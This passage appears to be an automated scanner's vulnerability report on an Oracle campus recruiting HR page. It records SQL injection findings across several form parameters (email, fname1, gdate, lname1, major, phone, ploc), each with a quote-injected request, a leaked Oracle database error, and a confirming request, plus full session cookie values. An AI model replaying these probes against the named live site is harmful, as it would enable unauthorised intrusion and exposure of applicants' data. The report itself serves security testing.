GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors'' &major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 2
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/campus/HR/us-profile-direct.jsp0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus/html4/loose.dtd">...[SNIP]...
1.4. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [email parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-add-direct.jsp
Issue detail
The email parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the email parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com' &university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 1
HTTP/1.1 500 Internal Server Error-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-01756: quoted string not properly terminated ...[SNIP]...
Request 2
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com'' &university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 2
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/campus/HR/us-profile-direct.jsp0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus/html4/loose.dtd">...[SNIP]...
1.5. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [fname1 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-add-direct.jsp
Issue detail
The fname1 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fname1 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss' &phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 1
HTTP/1.1 500 Internal Server Error-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-0 0933: SQL command not properly ended<br> at oracle.jdbc.driver.Datab...[SNIP]...
Request 2
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss'' &phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 2
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/campus/HR/us-profile-direct.jsp0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus/html4/loose.dtd">...[SNIP]...
1.6. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [gdate parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-add-direct.jsp
Issue detail
The gdate parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gdate parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012' °ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 1
HTTP/1.1 500 Internal Server Error-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-0 0933: SQL command not properly ended<br> at oracle.jdbc.driver.Datab...[SNIP]...
Request 2
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012'' °ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 2
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/campus/HR/us-profile-direct.jsp0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus/html4/loose.dtd">...[SNIP]...
1.7. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [lname1 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-add-direct.jsp
Issue detail
The lname1 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lname1 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss' &fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 1
HTTP/1.1 500 Internal Server Error-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-0 0933: SQL command not properly ended<br> at oracle.jdbc.driver.Datab...[SNIP]...
Request 2
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss'' &fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 2
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/campus/HR/us-profile-direct.jsp0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus/html4/loose.dtd">...[SNIP]...
1.8. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [major parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-add-direct.jsp
Issue detail
The major parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the major parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss' &curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 1
HTTP/1.1 500 Internal Server Error-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-0 0933: SQL command not properly ended<br> at oracle.jdbc.driver.Datab...[SNIP]...
Request 2
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss'' &curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 2
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/campus/HR/us-profile-direct.jsp0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus/html4/loose.dtd">...[SNIP]...
1.9. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [phone parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-add-direct.jsp
Issue detail
The phone parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the phone parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss' &email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 1
HTTP/1.1 500 Internal Server Error-10g/10.1.3.0.0 Oracle-HTTP-Server0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-0 0933: SQL command not properly ended<br> at oracle.jdbc.driver.Datab...[SNIP]...
Request 2
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss'' &email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e
Response 2
HTTP/1.1 200 OK-10g/10.1.3.0.0 Oracle-HTTP-Server/campus/HR/us-profile-direct.jsp0d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus/html4/loose.dtd">...[SNIP]...
1.10. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [ploc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://campus.oracle.com
Path:
/campus/HR/us-profile-add-direct.jsp
Issue detail
The ploc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ploc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012°ree=Bachelors&major=xss&curloc=xss&ploc=xss' &position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/campus/HR/us-profile-direct.jsp?flag=0;q=0.30d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; 